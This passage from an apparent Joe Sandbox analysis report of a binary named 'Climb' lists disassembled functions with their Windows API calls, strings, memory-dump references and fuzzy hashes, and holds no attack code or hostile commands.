Instruction Fuzzy Hash: E8818B71504306AFD710EF25C884ABA7BE8FB99354F08092EFD85B7291DB70D905DBA2

Function 00572FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00573035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00573045
CreateCompatibleDC.GDI32(?), ref: 00573051
SelectObject.GDI32(00000000,?), ref: 0057305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 005730CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00573109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0057312D
SelectObject.GDI32(?,?), ref: 00573135
DeleteObject.GDI32(?), ref: 0057313E
DeleteDC.GDI32(?), ref: 00573145
ReleaseDC.USER32(00000000,?), ref: 00573150

Strings

(, xrefs: 005730EA

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 1d5188ad3ec2de117c734ff69bc896af54361805f8dc5b942aa6463836b31c2a
Instruction ID: c537250f00d09cafb459e6c9e5eb73a97611197ecdfc2473f721646a19185c45
Opcode Fuzzy Hash: 1d5188ad3ec2de117c734ff69bc896af54361805f8dc5b942aa6463836b31c2a
Instruction Fuzzy Hash: 3E61D475D00219EFCB04CFA4D888EAEBBF5FF48310F208519E959A7250D775A941EF60

Function 005552AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 005552E6
GetWindowTextW.USER32(?,?,00000400), ref: 00555328
_wcslen.LIBCMT ref: 00555339
CharUpperBuffW.USER32(?,00000000), ref: 00555345
_wcsstr.LIBVCRUNTIME ref: 0055537A
GetClassNameW.USER32(00000018,?,00000400), ref: 005553B2
GetWindowTextW.USER32(?,?,00000400), ref: 005553EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00555445
GetClassNameW.USER32(?,?,00000400), ref: 00555477
GetWindowRect.USER32(?,?), ref: 005554EF

Strings

ThumbnailClass, xrefs: 005553BD, 00555450

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 17af7aad05ef21661e1baa749741a76db1f94d8c716b7d3bea7fb6b94d368f57
Instruction ID: c2cdf488cc946dda52b3ebce6d3c2c688a3a43ddd40ece5eacae50f61faf0d50
Opcode Fuzzy Hash: 17af7aad05ef21661e1baa749741a76db1f94d8c716b7d3bea7fb6b94d368f57
Instruction Fuzzy Hash: 0C91B271104A06AFDB04CF24C8B5AAABBA9FF41345F00451AFE8A82191FB31ED59CB91

Function 0055C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(005C29C0,000000FF,00000000,00000030), ref: 0055C973
SetMenuItemInfoW.USER32(005C29C0,00000004,00000000,00000030), ref: 0055C9A8
Sleep.KERNEL32(000001F4), ref: 0055C9BA
GetMenuItemCount.USER32(?), ref: 0055CA00
GetMenuItemID.USER32(?,00000000), ref: 0055CA1D
GetMenuItemID.USER32(?,-00000001), ref: 0055CA49
GetMenuItemID.USER32(?,?), ref: 0055CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0055CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0055CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0055CB0C

Strings

0, xrefs: 0055C904

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: d5cfc4720b15bc3dbf26a91d15d1993d1e6ea674337b1db23dc1b2dd85355215
Instruction ID: d601768b08b59a5d1a6233a369a50de638337bbde38de36214036d3046758c06
Opcode Fuzzy Hash: d5cfc4720b15bc3dbf26a91d15d1993d1e6ea674337b1db23dc1b2dd85355215
Instruction Fuzzy Hash: 8B616B70A0034AAFDF11CFA4C8A9AAE7FB9FB05359F040456ED11A3291D734AD08DB61

Function 0055E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0055E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0055E4FA
_wcslen.LIBCMT ref: 0055E504
_wcsstr.LIBVCRUNTIME ref: 0055E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0055E570

Strings

%u.%u.%u.%u, xrefs: 0055E64E
04090000, xrefs: 0055E5A6
StringFileInfo\, xrefs: 0055E543
DefaultLangCodepage, xrefs: 0055E5D3
\VarFileInfo\Translation, xrefs: 0055E568

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: f3e27304867a94aa75414d95667065579ac286fdb37b6d0a2695498413b8b96c
Instruction ID: 3d5c058b9e54b662b67ee1ac51f11efb53a1b626e8011a766f417cb761584a38
Opcode Fuzzy Hash: f3e27304867a94aa75414d95667065579ac286fdb37b6d0a2695498413b8b96c
Instruction Fuzzy Hash: 1141D2725402197AEB04AA649C4BEFF7FACFF95750F00041AFD01A60C2FA74AA4196A5

Function 0057D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0057D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0057D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0057D7A8

Part of subcall function 0057D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0057D70A
Part of subcall function 0057D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0057D71D
Part of subcall function 0057D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0057D72F
Part of subcall function 0057D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0057D765
Part of subcall function 0057D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0057D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 0057D753

Strings

advapi32.dll, xrefs: 0057D718
RegDeleteKeyExW, xrefs: 0057D729

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 8fd54efdaedfd3e5e638b281c6c3d7032196fa24baca919b9b956955650429b5
Instruction ID: 430d63fd42ec23997c608f20338f5b5249d9009a0a0655d1e9834e224947be17
Opcode Fuzzy Hash: 8fd54efdaedfd3e5e638b281c6c3d7032196fa24baca919b9b956955650429b5
Instruction Fuzzy Hash: 51315E75901129BBDB25AB90EC8CEFFBFBCEF55750F004165B809A2140DA349E49EBB0

Function 0055EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0055EFCB

Part of subcall function 0050F215: timeGetTime.WINMM(?,?,0055EFEB), ref: 0050F219

Sleep.KERNEL32(0000000A), ref: 0055EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0055F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0055F03E
SetActiveWindow.USER32 ref: 0055F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0055F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0055F08A
Sleep.KERNEL32(000000FA), ref: 0055F095
IsWindow.USER32 ref: 0055F0A1
EndDialog.USER32(00000000), ref: 0055F0B2

Strings

BUTTON, xrefs: 0055F030

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 2b5e80907edac45fd2100913ba4b1e4b1b939b83131253515b2a0329726c15d8
Instruction ID: b09826b26d0d98eac441b5235a9590933ed3afce4205eef07e5df96385625641
Opcode Fuzzy Hash: 2b5e80907edac45fd2100913ba4b1e4b1b939b83131253515b2a0329726c15d8
Instruction Fuzzy Hash: 1521A171100609BFE7106F20AC9DE6A7FA9FB64B16F045026FC02922F2CB214D8CA761

Function 0055F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0055F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0055F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0055F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0055F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0055F3BE

Strings

play PlayMe wait, xrefs: 0055F3A8
alias PlayMe, xrefs: 0055F34D
status PlayMe mode, xrefs: 0055F36F
open , xrefs: 0055F323
close PlayMe, xrefs: 0055F385, 0055F3B2
play PlayMe, xrefs: 0055F3B9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: d3f9a192289cdce4ab410542314acc2b32f32c2e6f5ab3d68721d36098386983
Instruction ID: fda4f84b4986479cf52406d66b0753ca41988c7bf4644297b07cc83de5ab72c8
Opcode Fuzzy Hash: d3f9a192289cdce4ab410542314acc2b32f32c2e6f5ab3d68721d36098386983
Instruction Fuzzy Hash: 1E11A371A9016D79E720A366CC5AEFF6E7CFFD6B44F00082B7911E20D1DAA06908C6B5

Function 00522FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00523007

Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60

_free.LIBCMT ref: 00523013
_free.LIBCMT ref: 0052301E
_free.LIBCMT ref: 00523029
_free.LIBCMT ref: 00523034
_free.LIBCMT ref: 0052303F
_free.LIBCMT ref: 0052304A
_free.LIBCMT ref: 00523055
_free.LIBCMT ref: 00523060
_free.LIBCMT ref: 0052306E

Strings

&Y, xrefs: 00522FFE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &Y
API String ID: 776569668-895024872
Opcode ID: 87444db94ae15c11af52dea9f3edab3a30ac86417c86c3c45bc398b55750156d
Instruction ID: 0f7b93bf14aaaaf34f544617fadd24dfd177ae569e1b76d73050f42b04d036f6
Opcode Fuzzy Hash: 87444db94ae15c11af52dea9f3edab3a30ac86417c86c3c45bc398b55750156d
Instruction Fuzzy Hash: B011A47A140119BFCB05EF94E846CDD3FA5FF46350FC144A5FA089B2A2DA31EA529F90

Function 0055A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0055A9D9
SetKeyboardState.USER32(?), ref: 0055AA44
GetAsyncKeyState.USER32(000000A0), ref: 0055AA64
GetKeyState.USER32(000000A0), ref: 0055AA7B
GetAsyncKeyState.USER32(000000A1), ref: 0055AAAA
GetKeyState.USER32(000000A1), ref: 0055AABB
GetAsyncKeyState.USER32(00000011), ref: 0055AAE7
GetKeyState.USER32(00000011), ref: 0055AAF5
GetAsyncKeyState.USER32(00000012), ref: 0055AB1E
GetKeyState.USER32(00000012), ref: 0055AB2C
GetAsyncKeyState.USER32(0000005B), ref: 0055AB55
GetKeyState.USER32(0000005B), ref: 0055AB63

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: aa7fe7da45185879015c5dfa35d4fdd8d6957741d0684e42c59d77ff7283dd86
Instruction ID: 849b73dcfa5376c077eaa5ee3979fa949f16772c270e92b8a82dc8986442c1eb
Opcode Fuzzy Hash: aa7fe7da45185879015c5dfa35d4fdd8d6957741d0684e42c59d77ff7283dd86
Instruction Fuzzy Hash: F551F87090479929FB35D7608874BAABFF56F11341F08469BCDC2175C2EA649B4CC7A3

Function 0055662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00556649
GetWindowRect.USER32(00000000,?), ref: 00556662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 005566C0
GetDlgItem.USER32(?,00000002), ref: 005566D0
GetWindowRect.USER32(00000000,?), ref: 005566E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00556736
GetDlgItem.USER32(?,000003E9), ref: 00556744
GetWindowRect.USER32(00000000,?), ref: 00556756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00556798
GetDlgItem.USER32(?,000003EA), ref: 005567AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005567C1
InvalidateRect.USER32(?,00000000,00000001), ref: 005567CE

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 86423ae1150154f06c2ab1ba4a2545f836fe66b22b90c3f7637655fb34f233a0
Instruction ID: 74cb6df4b84df6a9f3f61e091a6c33c92ed4303646015cabd2fab8387d179118
Opcode Fuzzy Hash: 86423ae1150154f06c2ab1ba4a2545f836fe66b22b90c3f7637655fb34f233a0
Instruction Fuzzy Hash: 76511F71A00209AFDF18CF69DD95AAEBBB5FB48315F508129F919E7290D7709D04CB60

Function 004F2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 004F2234: GetWindowLongW.USER32(?,000000EB), ref: 004F2242

GetSysColor.USER32(0000000F), ref: 004F2152

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 619e976193a94a5693c3d621b1498479a9e5373b3f31b9d58640b7b4fa3a3888
Instruction ID: d04bc01a2eadd8905af39332894e2f9db3589e48be10b59ba303046353bfa03c
Opcode Fuzzy Hash: 619e976193a94a5693c3d621b1498479a9e5373b3f31b9d58640b7b4fa3a3888
Instruction Fuzzy Hash: 0141E531100644AFDB205F389D48BBA3BB6BB51334F144256FFA2972E1C7758D42EB29

Function 004F13A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 005328D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005328EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005328FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00532912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00532933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00532942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0053295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 0053296E

Strings

(\, xrefs: 00532885

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (\
API String ID: 1268354404-3685820393
Opcode ID: da6ccc15786a9223c81ebb358dc8287123726f8117ea8143085ee59562cde013
Instruction ID: 753cd683b215839449d9f1446d7acc520f274652af349f588c775a7803f91e8f
Opcode Fuzzy Hash: da6ccc15786a9223c81ebb358dc8287123726f8117ea8143085ee59562cde013
Instruction Fuzzy Hash: 14518830600709EFDB24DF25CC45FAA7BB5FB98320F104519FA42A62E0D774E881AB54

Function 0058955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0

Part of subcall function 004F19CD: GetCursorPos.USER32(?), ref: 004F19E1
Part of subcall function 004F19CD: ScreenToClient.USER32(00000000,?), ref: 004F19FE
Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000001), ref: 004F1A23
Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000002), ref: 004F1A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 005895C7
ImageList_EndDrag.COMCTL32 ref: 005895CD
ReleaseCapture.USER32 ref: 005895D3
SetWindowTextW.USER32(?,00000000), ref: 0058966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00589681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0058975B

Strings

@GUI_DRAGFILE, xrefs: 005896F6
(\, xrefs: 0058956D
(\, xrefs: 00589728
@GUI_DROPID, xrefs: 005896AD

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$(\$(\
API String ID: 1924731296-1472263523
Opcode ID: a41692288560ff877d2519e7e892fa77febee090bb5e1248390faa2c3de11e10
Instruction ID: 21ca604803e32e0040638aa78e43c72546d9de2e447c8221a3840aaaaf6ac6bb
Opcode Fuzzy Hash: a41692288560ff877d2519e7e892fa77febee090bb5e1248390faa2c3de11e10
Instruction Fuzzy Hash: 0C516A70204304AFD704EF11CC5AFBA7BE4FB94714F400A2DF995A62E1DB759948DB92

Function 0055A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00540D31,00000001,0000138C,00000001,00000000,00000001,?,0056EEAE,005C2430), ref: 0055A091
LoadStringW.USER32(00000000,?,00540D31,00000001), ref: 0055A09A

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00540D31,00000001,0000138C,00000001,00000000,00000001,?,0056EEAE,005C2430,?), ref: 0055A0BC
LoadStringW.USER32(00000000,?,00540D31,00000001), ref: 0055A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0055A1E0

Strings

^ ERROR, xrefs: 0055A175
%s (%d) : ==> %s: %s %s, xrefs: 0055A1C4
Line %d:, xrefs: 0055A11A
Error: , xrefs: 0055A197
Line %d (File "%s"):, xrefs: 0055A109

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
